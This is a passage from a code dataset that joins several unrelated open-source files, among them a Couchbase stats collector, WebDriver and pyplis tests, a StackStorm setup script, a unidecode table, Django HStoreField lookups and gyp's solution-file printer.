for key, val in node_stats.items():
stats[key] = val
except Exception, err:
traceback.print_exc()
def get_mc_stats(self, server, bucketlist, nodes):
#print util.pretty_print(bucketlist)
for bucket in bucketlist:
bucket_name = bucket['name']
stats_buffer.node_stats[bucket_name] = {}
for node in nodes:
(node_server, node_port) = util.hostport(node['hostname'])
self.log.info(" node: %s %s" % (node_server, node['ports']['direct']))
stats = {}
mc = cb_bin_client.MemcachedClient(node_server, node['ports']['direct'])
if bucket["name"] != "Default":
mc.sasl_auth_cram_md5(bucket_name.encode("utf8"), bucket["saslPassword"].encode("utf8"))
self.get_mc_stats_per_node(mc, stats)
stats_buffer.node_stats[bucket_name][node['hostname']] = stats
def get_ns_stats(self, bucketlist, server, port, user, password, opts):
for bucket in bucketlist:
bucket_name = bucket['name']
stats_buffer.buckets[bucket_name] = copy.deepcopy(stats_buffer.stats)
cmd = 'bucket-node-stats'
for scale, stat_set in stats_buffer.buckets[bucket_name].iteritems():
for stat in stat_set.iterkeys():
sys.stderr.write('.')
self.log.debug("retrieve: %s" % stat)
c = buckets.BucketNodeStats(bucket_name, stat, scale)
json = c.runCmd('bucket-node-stats', server, port, user, password, opts)
stats_buffer.buckets[bucket_name][scale][stat] = json
sys.stderr.write('\n')
def collect_data(self,cluster, user, password, opts):
server, port = util.hostport(cluster)
#get node list info
nodes = self.get_hostlist(server, port, user, password, opts)
self.log.debug(util.pretty_print(stats_buffer.nodes))
#get bucket list
bucketlist = self.get_bucketlist(server, port, user, password, opts)
self.log.debug(util.pretty_print(stats_buffer.bucket_info))
#get stats from ep-engine
self.get_mc_stats(server, bucketlist, nodes)
self.log.debug(util.pretty_print(stats_buffer.node_stats))
#get stats from ns-server
self.get_ns_stats(bucketlist, server, port, user, password, opts)
self.log.debug(util.pretty_print(stats_buffer.buckets))
| apache-2.0 |
zmike/servo | tests/wpt/web-platform-tests/old-tests/webdriver/windows/window_manipulation.py | 142 | 1556 | # -*- mode: python; fill-column: 100; comment-column: 100; -*-
import os
import sys
import unittest
sys.path.insert(1, os.path.abspath(os.path.join(__file__, "../..")))
import base_test
from selenium.common import exceptions
class WindowingTest(base_test.WebDriverBaseTest):
def test_maximize(self):
#self.driver.get(self.webserver.where_is("windows/res/win1.html"))
self.driver.maximize_window()
def test_window_size_manipulation(self):
#self.driver.get(self.webserver.where_is("windows/res/win1.html"))
self.driver.set_window_size(400, 400)
window_size = self.driver.get_window_size()
self.assertTrue("width" in window_size)
self.assertTrue("height" in window_size)
self.assertEquals({"width": 400, "height":400}, window_size)
"""
todo: make that work
see: https://w3c.github.io/webdriver/webdriver-spec.html#setwindowsize
result = self.driver.set_window_size(100, 100)
self.assertTrue("status" in result)
self.assertEquals(result["status"], 500)
"""
def test_window_position_manipulation(self):
#self.driver.get(self.webserver.where_is("windows/res/win1.html"))
self.driver.set_window_position(400, 400)
window_position = self.driver.get_window_position()
self.assertTrue("x" in window_position)
self.assertTrue("y" in window_position)
self.assertEquals({"x": 400, "y": 400}, window_position)
if __name__ == "__main__":
unittest.main()
| mpl-2.0 |
Plexxi/st2 | contrib/runners/orquesta_runner/setup.py | 3 | 4346 | # -*- coding: utf-8 -*-
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os.path
from setuptools import setup
from setuptools import find_packages
from dist_utils import fetch_requirements
from dist_utils import apply_vagrant_workaround
from orquesta_runner import __version__
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
REQUIREMENTS_FILE = os.path.join(BASE_DIR, "requirements.txt")
install_reqs, dep_links = fetch_requirements(REQUIREMENTS_FILE)
apply_vagrant_workaround()
setup(
name="stackstorm-runner-orquesta",
version=__version__,
description="Orquesta workflow runner for StackStorm event-driven automation platform",
author="StackStorm",
author_email="info@stackstorm.com",
license="Apache License (2.0)",
url="https://stackstorm.com/",
install_requires=install_reqs,
dependency_links=dep_links,
test_suite="tests",
zip_safe=False,
include_package_data=True,
packages=find_packages(exclude=["setuptools", "tests"]),
package_data={"orquesta_runner": ["runner.yaml"]},
scripts=[],
entry_points={
"st2common.runners.runner": [
"orquesta = orquesta_runner.orquesta_runner",
],
"orquesta.expressions.functions": [
"st2kv = orquesta_functions.st2kv:st2kv_",
"task = orquesta_functions.runtime:task",
"basename = st2common.expressions.functions.path:basename",
"dirname = st2common.expressions.functions.path:dirname",
"from_json_string = st2common.expressions.functions.data:from_json_string",
"from_yaml_string = st2common.expressions.functions.data:from_yaml_string",
"json_dump = st2common.expressions.functions.data:to_json_string",
"json_parse = st2common.expressions.functions.data:from_json_string",
"json_escape = st2common.expressions.functions.data:json_escape",
"jsonpath_query = st2common.expressions.functions.data:jsonpath_query",
"regex_match = st2common.expressions.functions.regex:regex_match",
"regex_replace = st2common.expressions.functions.regex:regex_replace",
"regex_search = st2common.expressions.functions.regex:regex_search",
"regex_substring = st2common.expressions.functions.regex:regex_substring",
(
"to_human_time_from_seconds = "
"st2common.expressions.functions.time:to_human_time_from_seconds"
),
"to_json_string = st2common.expressions.functions.data:to_json_string",
"to_yaml_string = st2common.expressions.functions.data:to_yaml_string",
"use_none = st2common.expressions.functions.data:use_none",
"version_compare = st2common.expressions.functions.version:version_compare",
"version_more_than = st2common.expressions.functions.version:version_more_than",
"version_less_than = st2common.expressions.functions.version:version_less_than",
"version_equal = st2common.expressions.functions.version:version_equal",
"version_match = st2common.expressions.functions.version:version_match",
"version_bump_major = st2common.expressions.functions.version:version_bump_major",
"version_bump_minor = st2common.expressions.functions.version:version_bump_minor",
"version_bump_patch = st2common.expressions.functions.version:version_bump_patch",
"version_strip_patch = st2common.expressions.functions.version:version_strip_patch",
"yaml_dump = st2common.expressions.functions.data:to_yaml_string",
"yaml_parse = st2common.expressions.functions.data:from_yaml_string",
],
},
)
| apache-2.0 |
jgliss/pyplis | pyplis/test/test_highlevel_examples.py | 1 | 12011 | # -*- coding: utf-8 -*-
"""Pyplis high level test module.
This module contains some highlevel tests with the purpose to ensure
basic functionality of the most important features for emission-rate
analyses.
Note
----
The module is based on the dataset "testdata_minimal" which can be found
in the GitHub repo in the folder "pyplis/data/". The dataset is based on
the official Pyplis testdata set which is used for the example scripts.
This minimal version does not contain all images and the images are reduced
in size (Gauss-pyramid level 4).
Author: Jonas Gliss
Email: jonasgliss@gmail.com
License: GPLv3+
"""
from __future__ import (absolute_import, division)
import pyplis
from os.path import join
from datetime import datetime
import numpy.testing as npt
import pytest
BASE_DIR = join(pyplis.__dir__, "data", "testdata_minimal")
IMG_DIR = join(BASE_DIR, "images")
START_PLUME = datetime(2015, 9, 16, 7, 10, 00)
STOP_PLUME = datetime(2015, 9, 16, 7, 20, 00)
START_CALIB = datetime(2015, 9, 16, 6, 59, 00)
STOP_CALIB = datetime(2015, 9, 16, 7, 3, 00)
CALIB_CELLS = {'a37': [8.59e17, 2.00e17],
'a53': [4.15e17, 1.00e17],
'a57': [19.24e17, 3.00e17]}
PLUME_FILE = join(IMG_DIR,
'EC2_1106307_1R02_2015091607110434_F01_Etna.fts')
PLUME_FILE_NEXT = join(IMG_DIR,
'EC2_1106307_1R02_2015091607113241_F01_Etna.fts')
BG_FILE_ON = join(IMG_DIR, 'EC2_1106307_1R02_2015091607022602_F01_Etna.fts')
BG_FILE_OFF = join(IMG_DIR, 'EC2_1106307_1R02_2015091607022216_F02_Etna.fts')
FUN = pyplis.custom_image_import.load_ecII_fits
@pytest.fixture(scope="function")
def plume_img():
return pyplis.Img(PLUME_FILE, FUN).pyr_up(1)
@pytest.fixture(scope="function")
def plume_img_next():
return pyplis.Img(PLUME_FILE_NEXT, FUN).pyr_up(1)
@pytest.fixture(scope="function")
def bg_img_on():
return pyplis.Img(BG_FILE_ON, FUN).to_pyrlevel(0)
@pytest.fixture(scope="function")
def bg_img_off():
return pyplis.Img(BG_FILE_OFF, FUN).to_pyrlevel(0)
def _make_setup():
cam_id = "ecII"
# Define camera (here the default ecII type is used)
img_dir = IMG_DIR
# Load default information for Etna
source = pyplis.Source("etna")
# Provide wind direction
wind_info = {"dir": 0.0,
"dir_err": 1.0}
# camera location and viewing direction (altitude will be retrieved
# automatically)
geom_cam = {"lon" : 15.1129, # noqa: E241 E203
"lat" : 37.73122, # noqa: E241 E203
'altitude' : 800, # noqa: E241 E203
"elev" : 20.0, # noqa: E241 E203
"elev_err" : 5.0, # noqa: E241 E203
"azim" : 270.0, # noqa: E241 E203
"azim_err" : 10.0, # noqa: E241 E203
"alt_offset" : 15.0, # noqa: E241 E203
"focal_length" : 25e-3} # noqa: E241 E203
# the camera filter setup
filters = [pyplis.Filter(type="on", acronym="F01"),
pyplis.Filter(type="off", acronym="F02")]
cam = pyplis.Camera(cam_id, filter_list=filters, **geom_cam)
return pyplis.MeasSetup(img_dir,
camera=cam,
source=source,
wind_info=wind_info,
cell_info_dict=CALIB_CELLS,
auto_topo_access=False)
@pytest.fixture(scope="function")
def setup():
return _make_setup()
@pytest.fixture(scope="function")
def calib_dataset(setup):
"""Initialize calibration dataset."""
setup.start = START_CALIB
setup.stop = STOP_CALIB
return pyplis.CellCalibEngine(setup)
@pytest.fixture(scope="function")
def plume_dataset(setup):
"""Initialize measurement setup and create dataset from that."""
setup.start = START_PLUME
setup.stop = STOP_PLUME
# Create analysis object (from BaseSetup)
# The dataset takes care of finding all vali
return pyplis.Dataset(setup)
@pytest.fixture(scope="function")
def aa_image_list(plume_dataset, bg_img_on, bg_img_off, viewing_direction):
"""Prepare AA image list for further analysis."""
# Get on and off lists and activate dark correction
lst = plume_dataset.get_list("on")
lst.activate_darkcorr() # same as lst.darkcorr_mode = 1
off_list = plume_dataset.get_list("off")
off_list.activate_darkcorr()
# Prepare on and offband background images
bg_img_on.subtract_dark_image(lst.get_dark_image().to_pyrlevel(0))
bg_img_off.subtract_dark_image(off_list.get_dark_image().to_pyrlevel(0))
# set the background images within the lists
lst.set_bg_img(bg_img_on)
off_list.set_bg_img(bg_img_off)
# automatically set gas free areas
# NOTE: this corresponds to pyramid level 3 as the test data is
# stored in low res
lst.bg_model.set_missing_ref_areas(lst.this)
# Now update some of the information from the automatically set sky ref
# areas
lst.bg_model.xgrad_line_startcol = 1
lst.bg_model.xgrad_line_rownum = 2
off_list.bg_model.update(**lst.bg_model.settings_dict())
lst.bg_model.mode = 0
off_list.bg_model.mode = 0
lst.calc_sky_background_mask()
lst.aa_mode = True # activate AA mode
# =============================================================================
#
# m = lst.bg_model
# ax = lst.show_current()
# ax.set_title("MODE: %d" %m.mode)
# m.plot_tau_result()
#
# =============================================================================
# =============================================================================
# for mode in range(1,7):
# lst.bg_model.CORR_MODE = mode
# off_list.bg_model.CORR_MODE = mode
# lst.load()
# ax = lst.show_current()
# ax.set_title("MODE: %d" %m.mode)
# m.plot_tau_result()
# =============================================================================
lst.meas_geometry = viewing_direction
return lst
@pytest.fixture(scope="function")
def line():
"""Create an example retrieval line."""
return pyplis.LineOnImage(630, 780, 1000, 350, pyrlevel_def=0,
normal_orientation="left")
@pytest.fixture(scope="function")
def geometry(plume_dataset):
return plume_dataset.meas_geometry
@pytest.fixture(scope="function")
def viewing_direction(geometry):
"""Find viewing direction of camera based on MeasGeometry."""
from geonum import GeoPoint
# Position of SE crater in the image (x, y)
se_crater_img_pos = [720, 570] # [806, 736] (changed on 12/5/19)
# Geographic position of SE crater (extracted from Google Earth)
# The GeoPoint object (geonum library) automatically retrieves the altitude
# using SRTM data
se_crater = GeoPoint(37.747757, 15.002643, altitude=3103.0)
# The following method finds the camera viewing direction based on the
# position of the south east crater.
new_elev, new_azim, _, basemap =\
geometry.find_viewing_direction(
pix_x=se_crater_img_pos[0],
pix_y=se_crater_img_pos[1],
pix_pos_err=100, # for uncertainty estimate
geo_point=se_crater,
draw_result=False,
update=True) # overwrite old settings
return geometry
def test_setup(setup):
"""Test some properties of the MeasSetup object."""
s = setup.source
vals_exact = [setup.save_dir == setup.base_dir,
setup.camera.cam_id]
vals_approx = [sum([sum(x) for x in setup.cell_info_dict.values()]),
s.lon + s.lat + s.altitude]
nominal_exact = [True, "ecII"]
nominal_approx = [3.798e18, 3381.750]
npt.assert_array_equal(vals_exact, nominal_exact)
npt.assert_allclose(vals_approx, nominal_approx, rtol=1e-4)
def test_dataset(plume_dataset):
"""Test certain properties of the dataset object."""
ds = plume_dataset
keys = list(ds.img_lists_with_data.keys())
vals_exact = [ds.img_lists["on"].nof + ds.img_lists["off"].nof,
sum(ds.current_image("on").shape),
keys[0], keys[1], ds.cam_id]
nominal_exact = [178, 2368, "on", "off", "ecII"]
npt.assert_array_equal(vals_exact, nominal_exact)
def test_find_viewdir(viewing_direction):
"""Correct viewing direction using location of Etna SE crater."""
vals = [viewing_direction.cam_azim, viewing_direction.cam_azim_err,
viewing_direction.cam_elev, viewing_direction.cam_elev_err]
npt.assert_allclose(actual=vals,
desired=[280.21752138146036, 1.0656706289128692,
13.72632050624192, 1.0656684171601736],
rtol=1e-7)
def test_imglists(plume_dataset):
"""Test some properties of the on and offband image lists."""
on = plume_dataset._lists_intern["F01"]["F01"]
off = plume_dataset._lists_intern["F02"]["F02"]
vals_exact = [on.list_id, off.list_id]
nominal_exact = ["on", "off"]
npt.assert_array_equal(vals_exact, nominal_exact)
def test_line(line):
"""Test some features from example retrieval line."""
n1, n2 = line.normal_vector
l1 = line.convert(1, [100, 100, 1200, 1024])
# compute values to be tested
vals = [line.length(), line.normal_theta, n1, n2,
l1.length() / line.length(), sum(l1.roi_def)]
# set nominal values
nominal = [567, 310.710846671181, -0.7580108737829234, -0.6522419146504225,
0.5008818342151675, 1212]
npt.assert_allclose(vals, nominal, rtol=1e-7)
def test_geometry(geometry):
"""Test important results from geometrical calculations."""
res = geometry.compute_all_integration_step_lengths()
vals = [res[0].mean(), res[1].mean(), res[2].mean()]
npt.assert_allclose(actual=vals,
desired=[2.0292366, 2.0292366, 10909.873],
rtol=1e-7)
def test_optflow(plume_img, plume_img_next, line):
"""Test optical flow calculation."""
flow = pyplis.OptflowFarneback()
flow.set_images(plume_img, plume_img_next)
flow.calc_flow()
len_img = flow.get_flow_vector_length_img()
angle_img = flow.get_flow_orientation_img()
l = line.convert(plume_img.pyrlevel)
res = flow.local_flow_params(line=l, dir_multi_gauss=False)
nominal = [0.658797,
-41.952854,
-65.971787,
22.437565,
0.128414,
0.086898,
28.07,
0.518644]
vals = [len_img.mean(),
angle_img.mean(), res["_dir_mu"],
res["_dir_sigma"], res["_len_mu_norm"],
res["_len_sigma_norm"], res["_del_t"],
res["_significance"]]
npt.assert_allclose(vals, nominal, rtol=1e-5)
return flow
def test_auto_cellcalib(calib_dataset):
"""Test if automatic cell calibration works."""
calib_dataset.find_and_assign_cells_all_filter_lists()
keys = ["on", "off"]
nominal = [6., 845.50291, 354.502678, 3., 3.]
mean = 0
bg_mean = calib_dataset.bg_lists["on"].this.mean() +\
calib_dataset.bg_lists["off"].this.mean()
num = 0
for key in keys:
for lst in calib_dataset.cell_lists[key].values():
mean += lst.this.mean()
num += 1
vals = [num, mean, bg_mean, len(calib_dataset.cell_lists["on"]),
len(calib_dataset.cell_lists["off"])]
npt.assert_allclose(nominal, vals, rtol=1e-7)
def test_bg_model(plume_dataset):
"""Test properties of plume background modelling.
Uses the PlumeBackgroundModel instance in the on-band image
list of the test dataset object (see :func:`plume_dataset`)
"""
l = plume_dataset.get_list("on")
m = l.bg_model
m.set_missing_ref_areas(l.this)
# m.set_missing_ref_areas(plume_img())
if __name__ == "__main__":
stp = _make_setup()
| gpl-3.0 |
lepricon49/headphones | lib/unidecode/x0ad.py | 253 | 4766 | data = (
'gwan', # 0x00
'gwanj', # 0x01
'gwanh', # 0x02
'gwad', # 0x03
'gwal', # 0x04
'gwalg', # 0x05
'gwalm', # 0x06
'gwalb', # 0x07
'gwals', # 0x08
'gwalt', # 0x09
'gwalp', # 0x0a
'gwalh', # 0x0b
'gwam', # 0x0c
'gwab', # 0x0d
'gwabs', # 0x0e
'gwas', # 0x0f
'gwass', # 0x10
'gwang', # 0x11
'gwaj', # 0x12
'gwac', # 0x13
'gwak', # 0x14
'gwat', # 0x15
'gwap', # 0x16
'gwah', # 0x17
'gwae', # 0x18
'gwaeg', # 0x19
'gwaegg', # 0x1a
'gwaegs', # 0x1b
'gwaen', # 0x1c
'gwaenj', # 0x1d
'gwaenh', # 0x1e
'gwaed', # 0x1f
'gwael', # 0x20
'gwaelg', # 0x21
'gwaelm', # 0x22
'gwaelb', # 0x23
'gwaels', # 0x24
'gwaelt', # 0x25
'gwaelp', # 0x26
'gwaelh', # 0x27
'gwaem', # 0x28
'gwaeb', # 0x29
'gwaebs', # 0x2a
'gwaes', # 0x2b
'gwaess', # 0x2c
'gwaeng', # 0x2d
'gwaej', # 0x2e
'gwaec', # 0x2f
'gwaek', # 0x30
'gwaet', # 0x31
'gwaep', # 0x32
'gwaeh', # 0x33
'goe', # 0x34
'goeg', # 0x35
'goegg', # 0x36
'goegs', # 0x37
'goen', # 0x38
'goenj', # 0x39
'goenh', # 0x3a
'goed', # 0x3b
'goel', # 0x3c
'goelg', # 0x3d
'goelm', # 0x3e
'goelb', # 0x3f
'goels', # 0x40
'goelt', # 0x41
'goelp', # 0x42
'goelh', # 0x43
'goem', # 0x44
'goeb', # 0x45
'goebs', # 0x46
'goes', # 0x47
'goess', # 0x48
'goeng', # 0x49
'goej', # 0x4a
'goec', # 0x4b
'goek', # 0x4c
'goet', # 0x4d
'goep', # 0x4e
'goeh', # 0x4f
'gyo', # 0x50
'gyog', # 0x51
'gyogg', # 0x52
'gyogs', # 0x53
'gyon', # 0x54
'gyonj', # 0x55
'gyonh', # 0x56
'gyod', # 0x57
'gyol', # 0x58
'gyolg', # 0x59
'gyolm', # 0x5a
'gyolb', # 0x5b
'gyols', # 0x5c
'gyolt', # 0x5d
'gyolp', # 0x5e
'gyolh', # 0x5f
'gyom', # 0x60
'gyob', # 0x61
'gyobs', # 0x62
'gyos', # 0x63
'gyoss', # 0x64
'gyong', # 0x65
'gyoj', # 0x66
'gyoc', # 0x67
'gyok', # 0x68
'gyot', # 0x69
'gyop', # 0x6a
'gyoh', # 0x6b
'gu', # 0x6c
'gug', # 0x6d
'gugg', # 0x6e
'gugs', # 0x6f
'gun', # 0x70
'gunj', # 0x71
'gunh', # 0x72
'gud', # 0x73
'gul', # 0x74
'gulg', # 0x75
'gulm', # 0x76
'gulb', # 0x77
'guls', # 0x78
'gult', # 0x79
'gulp', # 0x7a
'gulh', # 0x7b
'gum', # 0x7c
'gub', # 0x7d
'gubs', # 0x7e
'gus', # 0x7f
'guss', # 0x80
'gung', # 0x81
'guj', # 0x82
'guc', # 0x83
'guk', # 0x84
'gut', # 0x85
'gup', # 0x86
'guh', # 0x87
'gweo', # 0x88
'gweog', # 0x89
'gweogg', # 0x8a
'gweogs', # 0x8b
'gweon', # 0x8c
'gweonj', # 0x8d
'gweonh', # 0x8e
'gweod', # 0x8f
'gweol', # 0x90
'gweolg', # 0x91
'gweolm', # 0x92
'gweolb', # 0x93
'gweols', # 0x94
'gweolt', # 0x95
'gweolp', # 0x96
'gweolh', # 0x97
'gweom', # 0x98
'gweob', # 0x99
'gweobs', # 0x9a
'gweos', # 0x9b
'gweoss', # 0x9c
'gweong', # 0x9d
'gweoj', # 0x9e
'gweoc', # 0x9f
'gweok', # 0xa0
'gweot', # 0xa1
'gweop', # 0xa2
'gweoh', # 0xa3
'gwe', # 0xa4
'gweg', # 0xa5
'gwegg', # 0xa6
'gwegs', # 0xa7
'gwen', # 0xa8
'gwenj', # 0xa9
'gwenh', # 0xaa
'gwed', # 0xab
'gwel', # 0xac
'gwelg', # 0xad
'gwelm', # 0xae
'gwelb', # 0xaf
'gwels', # 0xb0
'gwelt', # 0xb1
'gwelp', # 0xb2
'gwelh', # 0xb3
'gwem', # 0xb4
'gweb', # 0xb5
'gwebs', # 0xb6
'gwes', # 0xb7
'gwess', # 0xb8
'gweng', # 0xb9
'gwej', # 0xba
'gwec', # 0xbb
'gwek', # 0xbc
'gwet', # 0xbd
'gwep', # 0xbe
'gweh', # 0xbf
'gwi', # 0xc0
'gwig', # 0xc1
'gwigg', # 0xc2
'gwigs', # 0xc3
'gwin', # 0xc4
'gwinj', # 0xc5
'gwinh', # 0xc6
'gwid', # 0xc7
'gwil', # 0xc8
'gwilg', # 0xc9
'gwilm', # 0xca
'gwilb', # 0xcb
'gwils', # 0xcc
'gwilt', # 0xcd
'gwilp', # 0xce
'gwilh', # 0xcf
'gwim', # 0xd0
'gwib', # 0xd1
'gwibs', # 0xd2
'gwis', # 0xd3
'gwiss', # 0xd4
'gwing', # 0xd5
'gwij', # 0xd6
'gwic', # 0xd7
'gwik', # 0xd8
'gwit', # 0xd9
'gwip', # 0xda
'gwih', # 0xdb
'gyu', # 0xdc
'gyug', # 0xdd
'gyugg', # 0xde
'gyugs', # 0xdf
'gyun', # 0xe0
'gyunj', # 0xe1
'gyunh', # 0xe2
'gyud', # 0xe3
'gyul', # 0xe4
'gyulg', # 0xe5
'gyulm', # 0xe6
'gyulb', # 0xe7
'gyuls', # 0xe8
'gyult', # 0xe9
'gyulp', # 0xea
'gyulh', # 0xeb
'gyum', # 0xec
'gyub', # 0xed
'gyubs', # 0xee
'gyus', # 0xef
'gyuss', # 0xf0
'gyung', # 0xf1
'gyuj', # 0xf2
'gyuc', # 0xf3
'gyuk', # 0xf4
'gyut', # 0xf5
'gyup', # 0xf6
'gyuh', # 0xf7
'geu', # 0xf8
'geug', # 0xf9
'geugg', # 0xfa
'geugs', # 0xfb
'geun', # 0xfc
'geunj', # 0xfd
'geunh', # 0xfe
'geud', # 0xff
)
| gpl-3.0 |
edevil/django | django/contrib/postgres/fields/hstore.py | 14 | 4495 | import json
from django.contrib.postgres import forms
from django.contrib.postgres.fields.array import ArrayField
from django.core import exceptions
from django.db.models import Field, Lookup, Transform, TextField
from django.utils import six
from django.utils.translation import ugettext_lazy as _
__all__ = ['HStoreField']
class HStoreField(Field):
empty_strings_allowed = False
description = _('Map of strings to strings')
default_error_messages = {
'not_a_string': _('The value of "%(key)s" is not a string.'),
}
def db_type(self, connection):
return 'hstore'
def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
if lookup_type == 'contains':
return [self.get_prep_value(value)]
return super(HStoreField, self).get_db_prep_lookup(lookup_type, value,
connection, prepared=False)
def get_transform(self, name):
transform = super(HStoreField, self).get_transform(name)
if transform:
return transform
return KeyTransformFactory(name)
def validate(self, value, model_instance):
super(HStoreField, self).validate(value, model_instance)
for key, val in value.items():
if not isinstance(val, six.string_types):
raise exceptions.ValidationError(
self.error_messages['not_a_string'],
code='not_a_string',
params={'key': key},
)
def to_python(self, value):
if isinstance(value, six.string_types):
value = json.loads(value)
return value
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
return json.dumps(value)
def formfield(self, **kwargs):
defaults = {
'form_class': forms.HStoreField,
}
defaults.update(kwargs)
return super(HStoreField, self).formfield(**defaults)
@HStoreField.register_lookup
class HStoreContainsLookup(Lookup):
lookup_name = 'contains'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
params = lhs_params + rhs_params
return '%s @> %s' % (lhs, rhs), params
@HStoreField.register_lookup
class HStoreContainedByLookup(Lookup):
lookup_name = 'contained_by'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
params = lhs_params + rhs_params
return '%s <@ %s' % (lhs, rhs), params
@HStoreField.register_lookup
class HasKeyLookup(Lookup):
lookup_name = 'has_key'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
params = lhs_params + rhs_params
return '%s ? %s' % (lhs, rhs), params
@HStoreField.register_lookup
class HasKeysLookup(Lookup):
lookup_name = 'has_keys'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
params = lhs_params + rhs_params
return '%s ?& %s' % (lhs, rhs), params
class KeyTransform(Transform):
output_field = TextField()
def __init__(self, key_name, *args, **kwargs):
super(KeyTransform, self).__init__(*args, **kwargs)
self.key_name = key_name
def as_sql(self, compiler, connection):
lhs, params = compiler.compile(self.lhs)
return "%s -> '%s'" % (lhs, self.key_name), params
class KeyTransformFactory(object):
def __init__(self, key_name):
self.key_name = key_name
def __call__(self, *args, **kwargs):
return KeyTransform(self.key_name, *args, **kwargs)
@HStoreField.register_lookup
class KeysTransform(Transform):
lookup_name = 'keys'
output_field = ArrayField(TextField())
def as_sql(self, compiler, connection):
lhs, params = compiler.compile(self.lhs)
return 'akeys(%s)' % lhs, params
@HStoreField.register_lookup
class ValuesTransform(Transform):
lookup_name = 'values'
output_field = ArrayField(TextField())
def as_sql(self, compiler, connection):
lhs, params = compiler.compile(self.lhs)
return 'avals(%s)' % lhs, params
| bsd-3-clause |
allenlavoie/tensorflow | tensorflow/contrib/specs/python/__init__.py | 43 | 1255 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Init file, giving convenient access to all specs ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import,g-importing-member,redefined-builtin
from tensorflow.contrib.specs.python.params_ops import *
from tensorflow.contrib.specs.python.specs import *
from tensorflow.contrib.specs.python.specs_lib import *
from tensorflow.contrib.specs.python.specs_ops import *
from tensorflow.contrib.specs.python.summaries import *
# pylint: enable=wildcard-import,redefined-builtin
| apache-2.0 |
youprofit/django-cms | cms/models/placeholderpluginmodel.py | 49 | 1244 | # -*- coding: utf-8 -*-
from cms.models import CMSPlugin
from cms.models.fields import PlaceholderField
from cms.utils.copy_plugins import copy_plugins_to
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class PlaceholderReference(CMSPlugin):
name = models.CharField(max_length=255)
placeholder_ref = PlaceholderField(slotname='clipboard')
class Meta:
app_label = 'cms'
def __str__(self):
return self.name
def copy_to(self, placeholder, language):
copy_plugins_to(self.placeholder_ref.get_plugins(), placeholder, to_language=language)
def copy_from(self, placeholder, language):
copy_plugins_to(placeholder.get_plugins(language), self.placeholder_ref, to_language=self.language)
def move_to(self, placeholder, language):
for plugin in self.placeholder_ref.get_plugins():
plugin.placeholder = placeholder
plugin.language = language
plugin.save()
def move_from(self, placeholder, language):
for plugin in placeholder.get_plugins():
plugin.placeholder = self.placeholder_ref
plugin.language = language
plugin.save()
| bsd-3-clause |
webprogrammingunpas/pemogramanweb-theme | master/node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/tools/pretty_sln.py | 1831 | 5099 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import re
import sys
import pretty_vcproj
def BuildProject(project, built, projects, deps):
# if all dependencies are done, we can build it, otherwise we try to build the
# dependency.
# This is not infinite-recursion proof.
for dep in deps[project]:
if dep not in built:
BuildProject(dep, built, projects, deps)
print project
built.append(project)
def ParseSolution(solution_file):
# All projects, their clsid and paths.
projects = dict()
# A list of dependencies associated with a project.
dependencies = dict()
# Regular expressions that matches the SLN format.
# The first line of a project definition.
begin_project = re.compile(r'^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
r'}"\) = "(.*)", "(.*)", "(.*)"$')
# The last line of a project definition.
end_project = re.compile('^EndProject$')
# The first line of a dependency list.
begin_dep = re.compile(
r'ProjectSection\(ProjectDependencies\) = postProject$')
# The last line of a dependency list.
end_dep = re.compile('EndProjectSection$')
# A line describing a dependency.
dep_line = re.compile(' *({.*}) = ({.*})$')
in_deps = False
solution = open(solution_file)
for line in solution:
results = begin_project.search(line)
if results:
# Hack to remove icu because the diff is too different.
if results.group(1).find('icu') != -1:
continue
# We remove "_gyp" from the names because it helps to diff them.
current_project = results.group(1).replace('_gyp', '')
projects[current_project] = [results.group(2).replace('_gyp', ''),
results.group(3),
results.group(2)]
dependencies[current_project] = []
continue
results = end_project.search(line)
if results:
current_project = None
continue
results = begin_dep.search(line)
if results:
in_deps = True
continue
results = end_dep.search(line)
if results:
in_deps = False
continue
results = dep_line.search(line)
if results and in_deps and current_project:
dependencies[current_project].append(results.group(1))
continue
# Change all dependencies clsid to name instead.
for project in dependencies:
# For each dependencies in this project
new_dep_array = []
for dep in dependencies[project]:
# Look for the project name matching this cldis
for project_info in projects:
if projects[project_info][1] == dep:
new_dep_array.append(project_info)
dependencies[project] = sorted(new_dep_array)
return (projects, dependencies)
def PrintDependencies(projects, deps):
print "---------------------------------------"
print "Dependencies for all projects"
print "---------------------------------------"
print "-- --"
for (project, dep_list) in sorted(deps.items()):
print "Project : %s" % project
